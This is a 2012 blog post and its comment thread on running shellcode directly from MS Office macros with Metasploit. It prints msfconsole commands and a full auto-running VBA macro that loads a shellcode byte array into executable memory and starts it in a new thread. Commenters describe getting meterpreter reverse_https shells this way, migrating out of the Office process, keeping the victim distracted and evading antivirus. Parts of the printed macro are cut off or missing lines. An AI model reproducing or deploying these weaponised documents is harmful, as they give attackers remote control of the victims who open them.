Friday, February 3, 2012

Direct Shellcode Execution via MS Office Macros with Metasploit

scriptjunkie recently had a post on Direct shellcode execution in MS Office macros I didnt see it go into the metasploit trunk, but its there.  How to generate macro code is in the post but i'll repost it here so i dont have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works.  Just enable the Developer tab, then hit up the Visual Basic button to change code around.

msf > use payload/windows/exec
msf  payload(exec) > set CMD calc
CMD => calc
msf  payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf  payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long

Sub Auto_Open()
        Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
        Dim  Xlbufvetp As LongPtr
        Dim  Xlbufvetp As Long
        Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
        Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
        For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
                Wyzayxya = Hyeyhafxp(Zolde)
                Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
        Next Zolde
        Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
End Sub
Sub Workbook_Open()
End Sub

The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application.


Ficti0n said...

Used this on a test yestaurday... worked like a charm :P

One thing to note though, def migrate immediately via an RC script or something.. Shell dies with the document so have enough info in the document to keep the person busy for a minute..
Also here is another method using shellcode exec, just make sure to create a version of shellcode exec that bypasses AV when downloaded.

Stewart F said...

Great post! Been looking to do this for a while. When I tried to something beside open up calc (Like generating a meterpreter payload using msfvenom) I get very similar vba code but it just crashes Word 2010.

Any suggestions on how to get a useful payload to work this way?

CG said...

i used his template on the blog post with EXCEL 2010 but in meterpreter https and it worked with no problems (win7 64bit).

if i have some time i'll try with word

Stewart F said...

Thanks! it worked using that method in Word 2010 (not using msfvenom)

pipefish said...

Very cool. I used to use this method using
from the coresec blog

but now I have a new method!

Anonime said...

CG, could you share how did you reverse https with the xls provided from the blog?

It would be really interesting to know.
Would appreciate it.

CG said...

the same way as in the post

just do a:

msf > use payload/windows/meterpreter/reverse_https

fill in options

generate -t vba

Anonime said...

Got it ! Wow...and u r right, it works with the xls provided on the blog.
Tks so much bro.



Fails with Office 2007 because VB is not installed by default on it.

Anonymous said...

I've noticed that this crashes Word 2010. Any idea why (Win7 64-bit)?

Seems to work fine on Word 2007 (WinXP).


CG said...

works fine for me win7 64 bit

i have seen it crash when the handler cant be reached though.

Anonymous said...

I tried this and it worked on my system but when try testing on another system it doesn't work. I mean i create .doc with VBA on PC1 and test on PC2 it doesn't work, it only work on the system i create it on.

Anyone have an idea what might be wrong?

CG said...

are the architectures the same?

jdiggidy said...

Hey Folks - just wanted to share the comment scriptjunkie made with regard to this crashing on Win7 running Office 2007 (found here:

Maybe it’s trying to run 32 bit shellcode which crashes in a 64 bit process? Generate a 64 bit calc with windows/x64/exec, and see if that works. You should also be able to set up a x64 and x86 handler, and put both payloads into one doc with something like this around the shellcode:
#if Win64 then
‘ Code is running in 64-bit version of Microsoft Office
‘ Code is running in 32-bit version of Microsoft Office
#end if
then it should work in both versions. But I don’t have a 64 bit office to test. :-/ Otherwise it’s just break out the windbg and see what happens.

I haven't got it working yet, but thought I'd share and see if anyone else might have figured this one out.

Unknown said...

Works well , the only problem is , it gets detected by AVS .Does anyone know any AV evasion methods for this script ?